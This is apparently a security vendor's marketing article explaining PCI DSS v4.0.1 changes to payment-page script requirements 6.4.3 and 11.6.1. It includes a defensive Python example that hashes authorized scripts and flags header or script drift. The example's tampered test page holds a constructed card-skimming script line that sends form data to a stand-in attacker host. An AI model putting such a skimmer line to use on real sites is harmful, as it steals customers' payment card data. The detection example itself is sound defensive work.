The PCI Security Standards Council (PCI SSC) released PCI DSS v4.0.1 in June 2024, a limited revision that replaces v4.0 when that version is retired at the end of December 2024. V4.0 added 64 new requirements relative to v3.2.1, which was retired in March 2024, but have no fear, online merchants: PCI DSS v4.0.1 adds none. It is a housekeeping exercise in response to community feedback that clarifies language and fixes typos and formatting issues. Everything amended is listed in PCI SSC's Summary of Changes document. There are quite a few changes, so this article focuses on the revisions to the two requirements that Reflectiz helps you manage: 6.4.3 and 11.6.1.
PCI DSS 4.0.1: Section 6.4.3
PCI DSS 4.0.1 requirement 6.4.3 requires entities to implement a method to confirm that each script present on their payment pages is authorized, justified, and has its integrity assured. It is now common for merchants to use third-party service providers (TPSPs) to process customer payments, with the provider's payment form loaded into an iframe, so the update clarifies that the merchant is not responsible for the scripts inside that iframe. That responsibility rests with the TPSP, and the guidance says merchants can expect the provider to supply evidence that it meets requirement 6.4.3, in line with requirement 12.9 (TPSPs support their customers' PCI DSS compliance).
This was always the intention, but the update makes it explicit. Merchants are responsible only for ensuring the integrity, necessity, and authorization of scripts loaded into their own pages.
Under previous guidance, the merchant was expected to authorize scripts before they were loaded, but since that is almost impossible to do for scripts that vendors change at will, the emphasis has shifted to real-time monitoring of what the customer's browser actually receives. This is what Reflectiz does. Because a remote scan drives its own browser, it can also inspect the contents of any iframe, which are opaque to a monitoring script embedded in the parent page: the browser's same-origin policy blocks cross-origin access to a frame's DOM.
The guidance says, “Where the payment page will be loaded into an inline frame (iframe), restricting the location that the payment page can be loaded from, using the parent page’s Content Security Policy (CSP) can help prevent unauthorized content being substituted for the payment page.” In practice this means a frame-src directive on the merchant page that names only the TPSP's origin, so a compromised page cannot swap in a look-alike form from elsewhere; the TPSP can complement it with a frame-ancestors directive on its own response to control which sites may embed the form.
6.4.3 also says, under the Defined Approach, that an inventory of all scripts is maintained with written business or technical justification as to why each is necessary. This tightens the 4.0 wording, which said merchants needed to show that scripts were “needed for the functionality of the payment page to accept a payment transaction.” Adding business reasons as an option recognizes that businesses often place scripts on the payment page that are not directly related to accepting payments. This isn’t a green light to add them freely, though: best practice is still to load as few scripts as possible to keep the attack surface as small as possible.
PCI DSS 4.0.1: Section 11.6.1
PCI DSS 4.0.1 requirement 11.6.1 focuses on detecting and responding to unauthorized changes to payment pages as received by the customer’s browser. It clarifies that the requirement applies to “security-impacting HTTP headers and the script contents of payment pages…” The changes, again in response to community feedback, are:
- It changes the previous “once every seven days” to “weekly” to align with Table 4 (see page 25).
- It adds three Applicability Notes to clarify how the requirement applies to the merchant’s webpage(s) and the third-party payment processor’s embedded payment pages or forms.
- The Purpose section is expanded with more detail about what can be detected when comparing HTTP headers and the content of payment pages received by the customer’s browser.
- Under Good Practice, it reiterates the guidance that any third-party payment processor can be expected to provide evidence that it meets this requirement if its forms are included on the payment page.
- In the Examples section, it clarifies that the mechanisms that detect and report on changes to headers and content of payment pages “could include, but are not limited to, a combination of the following techniques”, making explicit that the list is not exhaustive and that website owners may meet the requirement with whatever combination of tools and techniques they judge most appropriate.
One of those can be Reflectiz, which now includes smart approvals that save time while improving efficiency and security. It is what this part of the guidance calls for:
External monitoring by systems that request and analyze the received web pages (also known as synthetic user monitoring) can detect changes to JavaScript in payment pages and alert personnel.
This ‘synthetic user monitoring’ is what Reflectiz does: it requests the page the way a visitor’s browser would, so a scan places no more load on your website than a single visitor. The intelligent approval system lets you define acceptable script behaviors and automatically approve scripts that stay within them, which frees your security teams to focus on reviewing exceptions and makes it easier to manage multiple payment pages.
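As an added illustration (not Reflectiz code and not text from the standard), the script below shows the two mechanisms the 6.4.3 and 11.6.1 sections above describe: an inventory that pins each authorized script to a content hash and records its written justification, and a synthetic check that compares a received page's security-impacting headers and script contents against that baseline and reports drift. The URLs, header values, page contents, the fetch callback and the injected inline "skimmer" are all constructed for the example; in production the headers and HTML would come from a real request and fetch() would download each external script as the browser does.

```python
import hashlib
from html.parser import HTMLParser


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Hypothetical 6.4.3 inventory captured at the last authorized change (constructed).
# External scripts are keyed by URL and pinned to a content hash; inline scripts are
# keyed by the hash of their text, so injected inline code surfaces as "unauthorized".
CHECKOUT_JS = b"window.Checkout={mount:function(sel){}};"
INLINE_JS = b"Checkout.mount('#card');"
INVENTORY = {
    "https://cdn.example.test/checkout.js": {
        "sha256": sha256_hex(CHECKOUT_JS),
        "justification": "Technical: renders the card entry form",
    },
    "inline:" + sha256_hex(INLINE_JS): {
        "sha256": sha256_hex(INLINE_JS),
        "justification": "Technical: mounts the card form into the page",
    },
}

# Security-impacting response headers (11.6.1) whose values must not drift; the
# CSP frame-src also pins where the PSP's payment iframe may be loaded from.
BASELINE_HEADERS = {
    "content-security-policy": (
        "default-src 'self'; script-src 'self' https://cdn.example.test; "
        "frame-src https://pay.example-psp.test"
    ),
    "strict-transport-security": "max-age=31536000; includeSubDomains",
}


class ScriptCollector(HTMLParser):
    """Collects (src, None) for external scripts and (None, body) for inline ones."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._inline = None  # text buffer while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.scripts.append((src, None))
        else:
            self._inline = []

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            self.scripts.append((None, "".join(self._inline).encode()))
            self._inline = None


def check_payment_page(headers, html, fetch):
    """Compare one received page with the baseline. fetch(url) returns the bytes of
    an external script as the browser got them. Returns a list of findings."""
    findings = []
    received = {k.lower(): v for k, v in headers.items()}
    for name, expected in BASELINE_HEADERS.items():
        if name not in received:
            findings.append(f"header missing: {name}")
        elif received[name] != expected:
            findings.append(f"header changed: {name}")
    parser = ScriptCollector()
    parser.feed(html)
    seen = set()
    for src, body in parser.scripts:
        key = src if src else "inline:" + sha256_hex(body)
        seen.add(key)
        entry = INVENTORY.get(key)
        if entry is None:
            findings.append(f"unauthorized script: {key}")
        elif src and sha256_hex(fetch(src)) != entry["sha256"]:
            findings.append(f"script content changed: {src}")
    findings += [f"authorized script missing: {k}" for k in INVENTORY if k not in seen]
    return findings


# Constructed responses standing in for a real synthetic fetch of the page.
GOOD_HTML = (
    '<html><body><iframe src="https://pay.example-psp.test/form"></iframe>'
    '<script src="https://cdn.example.test/checkout.js"></script>'
    "<script>Checkout.mount('#card');</script></body></html>"
)
TAMPERED_HTML = GOOD_HTML.replace(  # injected inline skimmer (constructed)
    "</body>", "<script>fetch('https://evil.test/?c='+document.forms[0].card)</script></body>"
)
LOOSENED_HEADERS = {**BASELINE_HEADERS, "content-security-policy": "default-src *"}
RESOURCES = {"https://cdn.example.test/checkout.js": CHECKOUT_JS}

if __name__ == "__main__":
    print(check_payment_page(BASELINE_HEADERS, GOOD_HTML, RESOURCES.__getitem__))  # []
    print(check_payment_page(LOOSENED_HEADERS, TAMPERED_HTML, RESOURCES.__getitem__))
```

On the constructed good response the check returns no findings; on the tampered response it reports the loosened CSP and the injected inline script. Keying inline scripts by hash rather than by position means an injected script always surfaces as unauthorized instead of shifting the baseline, and hashing external scripts at fetch time catches a vendor-side change even when the page's own HTML is untouched.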
Dedicated PCI Dashboard
We’ve made the process of managing your PCI DSS 4.0.1 compliance more streamlined with the introduction of our dedicated PCI dashboard (try it free for 30 days!) It lets you easily monitor and manage all payment page scripts that are loaded and executed in the customer’s browser and alerts you when unauthorized modifications take place, thanks to its advanced change and tamper detection mechanism.
Evidence gathering and reporting is a potentially time-consuming requirement of PCI DSS 4.0.1, but the PCI Dashboard cuts it down to size, letting you generate compliance reports for Qualified Security Assessors (QSAs) at the touch of a button.
Reflectiz also offers watertight web security that goes beyond PCI compliance. It creates an inventory of all third-party scripts and applications (and not just those that have access to payments and credit card data), and provides ongoing monitoring, with prioritized reports, customized to match your organization’s risk appetite.
There’s nothing to install with this sophisticated compliance and continuous threat management solution, as it’s executed remotely. Your security teams gain immediate real-time visibility over your online ecosystem, to keep your system and your customers’ sensitive payment data safe. Sign up today!